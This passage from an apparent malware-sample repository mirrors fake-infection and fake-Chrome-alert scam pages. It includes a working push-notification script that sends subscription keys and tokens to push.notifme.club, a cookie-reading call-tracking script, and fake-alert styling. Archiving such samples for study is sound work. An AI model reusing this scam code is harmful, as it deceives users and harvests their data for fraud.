url(https://fonts.gstatic.com/s/roboto/v15/CWB0XYA8bzo0kSThX0UTuA.woff2) format('woff2'); 103 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 104 | } 105 | /* cyrillic-ext */ 106 | @font-face { 107 | font-family: 'Roboto Mono'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzTOQ_MqJVwkKsUn0wKzc2I.woff2) format('woff2'); 111 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 112 | } 113 | /* cyrillic */ 114 | @font-face { 115 | font-family: 'Roboto Mono'; 116 | font-style: normal; 117 | font-weight: 400; 118 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzUj_cnvWIuuBMVgbX098Mw.woff2) format('woff2'); 119 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 120 | } 121 | /* greek-ext */ 122 | @font-face { 123 | font-family: 'Roboto Mono'; 124 | font-style: normal; 125 | font-weight: 400; 126 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY0bcKLIaa1LC45dFaAfauRA.woff2) format('woff2'); 127 | unicode-range: U+1F00-1FFF; 128 | } 129 | /* greek */ 130 | @font-face { 131 | font-family: 'Roboto Mono'; 132 | font-style: normal; 133 | font-weight: 400; 134 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY2o_sUJ8uO4YLWRInS22T3Y.woff2) format('woff2'); 135 | unicode-range: U+0370-03FF; 136 | } 137 | /* vietnamese */ 138 | @font-face { 139 | font-family: 'Roboto Mono'; 140 | font-style: normal; 141 | font-weight: 400; 142 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY76up8jxqWt8HVA3mDhkV_0.woff2) format('woff2'); 143 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 144 | } 145 | /* latin-ext */ 146 | @font-face { 147 | font-family: 'Roboto Mono'; 148 | font-style: normal; 149 | font-weight: 400; 150 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 151 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 152 | } 153 | /* latin */ 154 | @font-face { 155 | font-family: 'Roboto Mono'; 156 | font-style: normal; 157 | font-weight: 400; 158 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 159 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 160 | } -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Chrome Alert/x.png -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/backblue.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/backblue.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/fade.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/fade.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/doit.log: -------------------------------------------------------------------------------- 1 | -qwC2%Ps2u1%s%uN0%I0p3DaK0H0%kf2A25000%f#f -F "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" -%F "" -%l "ru, en, *" https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248 -O1 "D:\Monterix" +*.png +*.gif +*.jpg +*.jpeg +*.css +*.js -ad.doubleclick.net/* -mime:application/foobar 2 | File generated automatically on Wed, 25 Dec 2019 19:08:33, do NOT edit 3 | 4 | To update a mirror, just launch httrack without any parameters 5 | The existing cache will be used (and modified) 6 | To have other options, retype all parameters and launch HTTrack 7 | To continue an interrupted mirror, just launch httrack without any parameters 8 | 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.lst: -------------------------------------------------------------------------------- 1 | [www.mscheck022.com/sk/dc7c905a/us/index9cc5.html] 2 | [backblue.gif] 3 | [fade.gif] 4 | [index.html] 5 | [www.mscheck022.com/sk_pre/6/img/warn_.gif] 6 | [www.mscheck022.com/sk_pre/6/img/cross.gif] 7 | [www.mscheck022.com/sk_pre/6/img/icon_app.gif] 8 | [static.notifme.club/push_js/push_subs.js] 9 | [www.google-analytics.com/analytics.js] 10 | [www.mscheck022.com/sk/dc7c905a/us/index9cc5.html] 11 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.txt: -------------------------------------------------------------------------------- 1 | date size'/'remotesize flags(request:Update,Range state:File response:Modified,Chunked,gZipped) statuscode status ('servermsg') MIME Etag|Date URL localfile (from URL) 2 | 19:08:35 23/23 ---M-- 200 added ('OK') text/plain etag:%225b918bbd-17%22 https://www.mscheck022.com/robots.txt (from ) 3 | 19:08:35 17218/17218 ---M-Z 200 added ('OK') text/html date:Wed,%2025%20Dec%202019%2016:07:02%20GMT https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248 D:/Monterix/www.mscheck022.com/sk/dc7c905a/us/index9cc5.html (from ) 4 | 19:08:36 5054/5054 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-13be%22 https://www.mscheck022.com/sk_pre/6/img/warn_.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/warn_.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 5 | 19:08:36 191/191 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-bf%22 https://www.mscheck022.com/sk_pre/6/img/cross.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/cross.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 6 | 19:08:36 779/779 ---M-- 200 added ('OK') image/gif etag:%225b918bbd-30b%22 https://www.mscheck022.com/sk_pre/6/img/icon_app.gif D:/Monterix/www.mscheck022.com/sk_pre/6/img/icon_app.gif (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 7 | 19:08:37 5209/5209 ---M-Z 200 added ('OK') application/javascript etag:%221459-594b371ad45f2-gzip%22 https://static.notifme.club/push_js/push_subs.js D:/Monterix/static.notifme.club/push_js/push_subs.js (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 8 | 19:08:38 44470/44470 ---MC- 200 added ('OK') text/javascript date:Mon,%2019%20Aug%202019%2017:22:41%20GMT https://www.google-analytics.com/analytics.js D:/Monterix/www.google-analytics.com/analytics.js (from https://www.mscheck022.com/sk/dc7c905a/us/?clid=232086917583687680&p1=2553225&p2=windows&p3={language}&p4={isp}&p5={device}&p6=US&p7=2840684&p8=high&p9=4541248) 9 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/new.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/hts-cache/new.zip -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/readme.txt: -------------------------------------------------------------------------------- 1 | What's in this folder? 2 | 3 | This folder (hts-cache) has been generated by WinHTTrack 3.49-2+htsswf+htsjava 4 | and is used for updating this website. 5 | (The HTML website structure is stored here to allow fast updates) 6 | 7 | DO NOT delete this folder unless you do not want to update the mirror in the future!! 8 | (you can safely delete old.zip and old.lst files, however) 9 | 10 | note: the hts-log.txt file, and hts-cache folder, may contain sensitive information, 11 | such as username/password authentication for websites mirrored in this project 12 | do not share these files/folders if you want these information to remain private 13 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/hts-cache/winprofile.ini: -------------------------------------------------------------------------------- 1 | Near=0 2 | Test=0 3 | ParseAll=1 4 | HTMLFirst=0 5 | Cache=1 6 | NoRecatch=0 7 | Dos=0 8 | Index=1 9 | WordIndex=0 10 | MailIndex=0 11 | Log=1 12 | RemoveTimeout=0 13 | RemoveRateout=0 14 | KeepAlive=1 15 | FollowRobotsTxt=2 16 | NoErrorPages=0 17 | NoExternalPages=0 18 | NoPwdInPages=0 19 | NoQueryStrings=0 20 | NoPurgeOldFiles=0 21 | Cookies=1 22 | CheckType=1 23 | ParseJava=1 24 | HTTP10=0 25 | TolerantRequests=0 26 | UpdateHack=1 27 | URLHack=1 28 | StoreAllInCache=0 29 | LogType=0 30 | UseHTTPProxyForFTP=1 31 | Build=0 32 | PrimaryScan=3 33 | Travel=1 34 | GlobalTravel=0 35 | RewriteLinks=0 36 | BuildString=%%h%%p/%%n%%q.%%t 37 | Category= 38 | MaxHtml= 39 | MaxOther= 40 | MaxAll= 41 | MaxWait= 42 | Sockets= 43 | Retry= 44 | MaxTime= 45 | TimeOut= 46 | RateOut= 47 | UserID=Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98) 48 | Footer= 49 | AcceptLanguage=ru, en, * 50 | OtherHeaders= 51 | DefaultReferer= 52 | MaxRate=25000 53 | WildCardFilters=+*.png +*.gif +*.jpg +*.jpeg +*.css +*.js -ad.doubleclick.net/* -mime:application/foobar 54 | Proxy= 55 | Port= 56 | Depth= 57 | ExtDepth= 58 | MaxConn= 59 | MaxLinks= 60 | MIMEDefsExt1= 61 | MIMEDefsExt2= 62 | MIMEDefsExt3= 63 | MIMEDefsExt4= 64 | MIMEDefsExt5= 65 | MIMEDefsExt6= 66 | MIMEDefsExt7= 67 | MIMEDefsExt8= 68 | MIMEDefsMime1= 69 | MIMEDefsMime2= 70 | MIMEDefsMime3= 71 | MIMEDefsMime4= 72 | MIMEDefsMime5= 73 | MIMEDefsMime6= 74 | MIMEDefsMime7= 75 | MIMEDefsMime8= 76 | CurrentUrl=https://www.mscheck022.com/sk/dc7c905a/us/?clid%3d232086917583687680&p1%3d2553225&p2%3dwindows&p3%3d{language}&p4%3d{isp}&p5%3d{device}&p6%3dUS&p7%3d2840684&p8%3dhigh&p9%3d4541248 77 | CurrentAction=0 78 | CurrentURLList= 79 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Local index - HTTrack Website Copier 8 | 9 | 78 | 79 | 80 | 81 | 82 | 83 | HTTrack Website Copier - Open Source offline browser 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | Local index - HTTrack 99 | 100 | 101 | Index of locally available sites: 102 | 103 | 104 | 105 | · 106 | 107 | Warning 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | Mirror and index made by HTTrack Website Copier [XR&CO'2008] 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | © 2008 Xavier Roche & other contributors - Web Design: Leto Kauler. 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/static.notifme.club/push_js/push_subs.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | let targetHost = location.href; 3 | 4 | const OLD_PERMISSION = Notification.permission; 5 | 6 | const APPLICATION_ID = "BHLt6OGwTzOVdL3xjNitIdKuR6zfc26ictUyE2Fzk_uvOHkPSzoA7FTAOFDf9EQU0KDo1cYix0lpctzhT8a8TdA"; 7 | const SUBSCRIPTION_URL = "https:\/\/push.notifme.club\/index.php?subscribe=1"; 8 | const REDIRECT_URL = ""; 9 | const SERVICE_WORKER_LOCATION = "\/push_sw.js"; 10 | const INSTANCE_NUMBER = "1"; 11 | const ALLOW_REDIRECT = 0; 12 | 13 | function urlB64ToUint8Array(base64String) { 14 | const padding = ('=').repeat((4 - base64String.length % 4) % 4); 15 | const base64 = (base64String + padding) 16 | .replace(/\-/g, '+') 17 | .replace(/_/g, '/'); 18 | 19 | const rawData = window.atob(base64); 20 | const outputArray = new Uint8Array(rawData.length); 21 | 22 | for (let i = 0; i < rawData.length; ++i) { 23 | outputArray[i] = rawData.charCodeAt(i); 24 | } 25 | 26 | return outputArray; 27 | } 28 | 29 | function isNumber(n) { 30 | return !isNaN(parseFloat(n)) && isFinite(n); 31 | } 32 | 33 | function Uint8ArrayToBase64(rawArrayBuffer) { 34 | return btoa( 35 | String.fromCharCode.apply( 36 | null, 37 | new Uint8Array(rawArrayBuffer) 38 | ) 39 | ); 40 | } 41 | 42 | const redirectAllow = function () { 43 | if (ALLOW_REDIRECT) { 44 | top.location = REDIRECT_URL 45 | +'?r=' + "2" +'&aff=' + encodeURIComponent(pushaffname); 46 | } 47 | }; 48 | const redirectBlock = function () { 49 | if (ALLOW_REDIRECT) { 50 | top.location = REDIRECT_URL 51 | +'?r=' + "2" +'&aff=' + encodeURIComponent(pushaffname); 52 | } 53 | }; 54 | 55 | const redirectHost = function () { 56 | if (ALLOW_REDIRECT) { 57 | let domain_split = window.location.hostname.split('.'); 58 | if (!isNumber(domain_split[0])) { 59 | top.location = window.location.href.replace("://" + domain_split[0] + ".", "://0."); 60 | } else { 61 | let newNumber = parseInt(domain_split[0]) + 1; 62 | if (newNumber > INSTANCE_NUMBER) { 63 | redirectBlock(); 64 | } else { 65 | top.location = window.location.href.replace("://" + domain_split[0] + ".", "://" + String(newNumber) + "."); 66 | } 67 | } 68 | } 69 | }; 70 | 71 | const requestPermission = function () { 72 | if (OLD_PERMISSION !== 'default') { 73 | redirectHost(); 74 | return; 75 | } 76 | 77 | Notification.requestPermission(function (result) { 78 | if (result === 'granted') { 79 | navigator.serviceWorker.register(SERVICE_WORKER_LOCATION).then(function () { 80 | navigator.serviceWorker.ready.then(function (registration) { 81 | registration.pushManager.subscribe({ 82 | userVisibleOnly: true, 83 | applicationServerKey: urlB64ToUint8Array(APPLICATION_ID) 84 | }).then(function (pushSubscription) { 85 | const key = pushSubscription.getKey("p256dh"), 86 | token = pushSubscription.getKey("auth"), 87 | endpoint = pushSubscription.endpoint, 88 | tz = new Date().getTimezoneOffset(), 89 | contentEncoding = (PushManager.supportedContentEncodings || ['aesgcm'])[0]; 90 | 91 | if (OLD_PERMISSION !== 'granted') { 92 | var img = document.createElement("img"); 93 | 94 | img.style.visibility = 'hidden'; 95 | var subsUrl = SUBSCRIPTION_URL 96 | + '&tz=' + encodeURIComponent(tz.toString()) 97 | + '&e=' + encodeURIComponent(endpoint) 98 | + '&k=' + encodeURIComponent(Uint8ArrayToBase64(key)) 99 | + '&t=' + encodeURIComponent(Uint8ArrayToBase64(token)) 100 | + '&h=' + encodeURIComponent(targetHost) 101 | + '&aff=' + encodeURIComponent(pushaffname) 102 | + '&c=' + encodeURIComponent(contentEncoding); 103 | 104 | img.src = subsUrl; 105 | 106 | document.body.appendChild(img); 107 | 108 | fetch(subsUrl, { 109 | mode: 'no-cors' 110 | }).catch(function() { 111 | throw new Error("Postback fetch failed!"); 112 | }); 113 | } 114 | 115 | window.setTimeout(redirectAllow, 1300); 116 | }).catch(redirectBlock); 117 | }).catch(redirectBlock); 118 | }).catch(redirectBlock); 119 | } else { 120 | redirectBlock(); 121 | } 122 | }).catch(redirectBlock); 123 | }; 124 | requestPermission(); 125 | })(); -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/cross.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/cross.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/icon_app.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/icon_app.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/warn_.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake Infection/www.mscheck022.com/sk_pre/6/img/warn_.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ajax2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ajax2.gif -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/beep.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/beep.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/a.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ch/a.mp3 -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/alert.css: -------------------------------------------------------------------------------- 1 | body{ 2 | background: url(microsoft.png) no-repeat center fixed; 3 | 4 | }.style1{font-family:Arial,Helvetica,sans-serif;font-weight:bold;color:#FFFFFF;font-size:18px;}.style2{font-size:36px;font-family:"Courier New",Courier,monospace;}.style4{font-size:22px;font-family:"Courier New",Courier,monospace;}.style5{font-size:20px;font-family:"Courier New",Courier,monospace;}.style6{font-family:"Courier New",Courier,monospace} 5 | 6 | .cross{ 7 | position: absolute; 8 | top: 2px; 9 | right: 10px; 10 | font-weight: bolder; 11 | color: #888; 12 | text-decoration: none; 13 | } 14 | a:focus{ 15 | outline: 0 none; 16 | border: 0 none; 17 | } 18 | 19 | 20 | .chrome-alert{ 21 | position: fixed; 22 | top: 0px; 23 | left:0; 24 | right: 0; 25 | /*display: none;*/ 26 | } 27 | .chrome-alert>div{ 28 | margin: 0 auto; 29 | width: 440px; 30 | background: #FBFBFB; 31 | border: 1px solid #BABABA; 32 | min-height: 180px; 33 | border-radius: 3px; 34 | box-shadow: 0 2px 0 rgba(0,0,0,0.3); 35 | position: relative; 36 | font-family: 'Segoe UI'; 37 | } 38 | .chrome-alert h1{ 39 | font-size: 15px; 40 | font-weight: normal; 41 | margin: 0; 42 | margin-bottom: 5px; 43 | padding: 5px 10px; 44 | color: #414141; 45 | } 46 | .chrome-alert p{ 47 | font-size: 12px; 48 | padding: 0 10px; 49 | color: #414141; 50 | margin: 15px 0; 51 | } 52 | .chrome-alert .action_buttons{ 53 | overflow: auto; 54 | } 55 | .chrome-alert .action_buttons a{ 56 | float: right; 57 | font-size: 12px; 58 | margin-right: 15px; 59 | padding: 6px 25px; 60 | text-decoration: none; 61 | color: #414141; 62 | border: 1px solid #DDD; 63 | margin-top: 20px; 64 | border-radius: 2px; 65 | margin-bottom: 20px; 66 | } 67 | .chrome-alert .action_buttons a.active{ 68 | border: 1px solid #3B79ED; 69 | font-weight: bold; 70 | } 71 | .chrome-alert .content-box{ 72 | max-height:440px;overflow:auto; 73 | margin: 0 20px; 74 | } 75 | .chrome-alert .content-box p{ 76 | padding: 0; 77 | margin-left: 0; 78 | } 79 | .chrome-alert label{ 80 | padding: 0 20px; 81 | font-size: 12px; 82 | color: #414141; 83 | } 84 | .chrome-alert label:hover{ 85 | color: #3B79ED; 86 | } 87 | .chrome-alert label:focus{ 88 | color: #3B79ED; 89 | outline: dotted; 90 | } -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/microsoft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/ch/microsoft.png -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/ch/retreaver.js: -------------------------------------------------------------------------------- 1 | /*! retreaver 25-04-2016 */ 2 | !function(a){var b={configure:function(a){var c={addr:a.host,http_prefix:"http",urlregex:"/\\/\\/[^\\/]*\\/(.*)/"};"undefined"!=typeof a.prefix&&(c.http_prefix=a.prefix),window.Retreaver._connection=new b.Base.Request(c)}};a.Retreaver=b}(window),function(){"undefined"==typeof window.Retreaver&&(window.Retreaver={});var a={};a.assert_required_keys=function(){for(var a=Array.prototype.slice.call(arguments),b=a.shift(),c=0;c",c[0];);return a>4?a:!1}()),(6==a._ieVersion||7==a._ieVersion)&&null==Retreaver.easyxdm_loaded&&(Retreaver.easyxdm_loaded=!1),a._ieVersion},Retreaver.Base=a}(),function(a){var b=function(a,c,d){return 1===arguments.length?b.get(a):b.set(a,c,d)};b._document=document,b._navigator=navigator,b.defaults={path:"/"},b.get=function(a){return b._cachedDocumentCookie!==b._document.cookie&&b._renewCache(),b._cache[a]},b.set=function(a,c,d){return d=b._getExtendedOptions(d),b._document.cookie=b._generateCookieString(a,c,d),b},b._getExtendedOptions=function(c){return{path:c&&c.path||b.defaults.path,domain:c&&c.domain||b.defaults.domain,secure:c&&c.secure!==a?c.secure:b.defaults.secure}},b._isValidDate=function(a){return"[object Date]"===Object.prototype.toString.call(a)&&!isNaN(a.getTime())},b._generateCookieString=function(a,b,c){return a=encodeURIComponent(a),b=(b+"").replace(/[^!#$&-+\--:<-\[\]-~]/g,encodeURIComponent),c=c||{},a=a+"="+b+(c.path?";path="+c.path:""),a+=c.domain?";domain="+c.domain:"",a+=c.secure?";secure":""},b._getCookieObjectFromString=function(c){var d={};c=c?c.split("; "):[];for(var e=0;eb?a.length:b;return{key:decodeURIComponent(a.substr(0,b)),value:decodeURIComponent(a.substr(b+1))}},b._renewCache=function(){b._cache=b._getCookieObjectFromString(b._document.cookie),b._cachedDocumentCookie=b._document.cookie},b._areEnabled=function(){return b._navigator.cookieEnabled||"1"===b.set("cookies.js",1).get("cookies.js")},b.enabled=b._areEnabled(),"function"==typeof define&&define.amd?define(function(){return b}):"undefined"!=typeof exports?("undefined"!=typeof module&&module.exports&&(exports=module.exports=b),exports.Cookies=b):b,Retreaver.Base.Cookies=b}(),function(){var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="};Base64.encode=function(a){var b,c,d,e,f,g,h,i="",j=0;for(a=Base64._utf8_encode(a);j>2,f=(3&b)<<4|c>>4,g=(15&c)<<2|d>>6,h=63&d,isNaN(c)?g=h=64:isNaN(d)&&(h=64),i=i+Base64._keyStr.charAt(e)+Base64._keyStr.charAt(f)+Base64._keyStr.charAt(g)+Base64._keyStr.charAt(h);return i},Base64.decode=function(a){var b,c,d,e,f,g,h,i="",j=0;for(a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");j>4,c=(15&f)<<4|g>>2,d=(3&g)<<6|h,i+=String.fromCharCode(b),64!=g&&(i+=String.fromCharCode(c)),64!=h&&(i+=String.fromCharCode(d));return i=Base64._utf8_decode(i)},Base64._utf8_encode=function(string){string=string.replace(eval("/\\r\\n/g"),eval("String('\\n')"));for(var utftext="",n=0;nc?utftext+=String.fromCharCode(c):c>127&&2048>c?(utftext+=String.fromCharCode(c>>6|192),utftext+=String.fromCharCode(63&c|128)):(utftext+=String.fromCharCode(c>>12|224),utftext+=String.fromCharCode(c>>6&63|128),utftext+=String.fromCharCode(63&c|128))}return utftext},Base64._utf8_decode=function(a){for(var b="",c=0,d=c1=c2=0;cd?(b+=String.fromCharCode(d),c++):d>191&&224>d?(c2=a.charCodeAt(c+1),b+=String.fromCharCode((31&d)<<6|63&c2),c+=2):(c2=a.charCodeAt(c+1),c3=a.charCodeAt(c+2),b+=String.fromCharCode((15&d)<<12|(63&c2)<<6|63&c3),c+=3);return b},Retreaver.Base.Base64=Base64}(),function(){var a=Retreaver.Base,b=function(b){function c(){a.assert_required_keys(b,"type","primary_key"),"undefined"==typeof Retreaver.Base.Data._store[b.type]&&(Retreaver.Base.Data._store[b.type]={}),"undefined"==typeof Retreaver.Base.Data._store[b.type][b.primary_key]&&(Retreaver.Base.Data._store[b.type][b.primary_key]={})}var d=this;d.get=function(){var a={};if("undefined"==typeof arguments[0])a=Retreaver.Base.Data._store[b.type][b.primary_key];else if(1===arguments.length)a=Retreaver.Base.Data._store[b.type][b.primary_key][arguments[0]];else for(var c=0;c0))break;d&&(b[a[c]]=d)}return b}function extractCookie(a){var b=new RegExp(a+"=([^;]*)","g");try{return b.exec(document.cookie)[1]}catch(c){return!1}}function findOne(a,b){for(var c in b)for(var d in a)if(d==b[c])return a[d];return!1}var self=this,config={},resource_url="/api/v1/numbers?";self.perform=function(callback){function sendGARequest(a,b){body.ga=Base64.encode(a),body.c=Base64.encode(JSON.stringify(b)),Request.connection().getJSON(request_url,body,callback)}if("function"!=typeof callback)throw"ArgumentError: Expected to receive a callback function";var request_url=resource_url+"&campaign_key="+config.campaign_key;config.default_number_replacement&&(request_url=request_url+"&default_number="+config.default_number_replacement),config.message_replacement&&(request_url=request_url+"&message="+config.message_replacement);var body=new Object,uri=document.location.href;body.u=Base64.encode(uri),body.st=Base64.encode(tags_to_script_tags(config.number_matching_tags));var ou=Cookies.get("CallPixels-ou");getParts([document.location.href]).cpreset||!ou?Cookies.set("CallPixels-ou",body.u):body.ou=ou;var ga_acct="FAILED";try{_gaq.push(function(){ga_acct=eval("_gat._getTrackerByName()._getAccount()"),sendGARequest(ga_acct,getGACookies())})}catch(e){try{ga(function(tracker){var clientId=tracker.get("clientId"),allTrackers=eval("ga.getAll()");ga_acct=allTrackers[0].get("trackingId");var ga_cookies={};ga_cookies.__utma=clientId,ga_cookies.mp="yes",sendGARequest(ga_acct,ga_cookies)})}catch(f){Request.connection().getJSON(request_url,body,callback)}}},initialize(options)};Retreaver.Base.RequestNumber=RequestNumber}(),window.Retreaver.Cache={},function(){function a(b){if("undefined"!=typeof Retreaver.Base.Data._store){var c=Retreaver.Base.Data._store.numbers;if("undefined"!=typeof c){var d={};for(var e in c){var f=c[e];"true"===f.is_active&&("undefined"==typeof d[f.campaign_key]&&(d[f.campaign_key]=[],d[f.campaign_key].ids=[],d[f.campaign_key].hashes=[]),d[f.campaign_key].ids.push(f.id),d[f.campaign_key].hashes.push(f.id_checksum))}for(var g in d){var h={ids:d[g].ids,hashes:d[g].hashes};Retreaver.Base.Request.connection().postJSON("/api/v1/numbers/ping",h,[Retreaver.Base.Model.update,b],this)}}}setTimeout(a,15e3)}var b=Retreaver.Base;Retreaver.Number=function(a){function c(a){g.store(a),g.set("is_active","true")}function d(a){return"string"==typeof a&&(a=Retreaver.Number.extract_tags_from_string(a)),{tag_values:a,ids:[e("id")],campaign_key:e("campaign_key")}}function e(a){return g.get(a)}function f(){if(g.get("is_per_visitor")===!1)throw"Error: Tried to add tags to non per-visitor number."}var g=this;g.type="numbers",g.add_tags=function(a,b){f(),g.post_data("numbers/tag",d(a),b)},g.remove_tags=function(a,b){f(),g.post_data("numbers/untag",d(a),b)},g.remove_tags_by_keys=function(a,b){f(),"string"==typeof a&&(a=a.split(","));var c={tag_keys:a,ids:[e("id")],campaign_key:e("campaign_key")};g.post_data("numbers/untag/keys",c,b)},g.clear_tags=function(a){f();var b={ids:[e("id")],campaign_key:e("campaign_key"),all:"true"};g.post_data("numbers/untag",b,a)},g.release=function(){g.set("is_active","false")},g.initiate_call=function(a,c,d){"undefined"==typeof c&&(c={}),c.dial=a,c=b.merge(g.get("id","campaign_key"),c),g.post_data("numbers/initiate_call",c,d)},c(a)},Retreaver.Number.extract_tags_from_string=function(a){for(var b={},a=a.split(","),c=0;c 2 | 4 | 7 | 8 | 10 | 13 | 20 | 24 | 27 | 31 | 33 | 35 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /ジョークサイト/Fake MacOS Infection/firiedge/a.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョークサイト/Fake MacOS Infection/firiedge/a.mp3 -------------------------------------------------------------------------------- 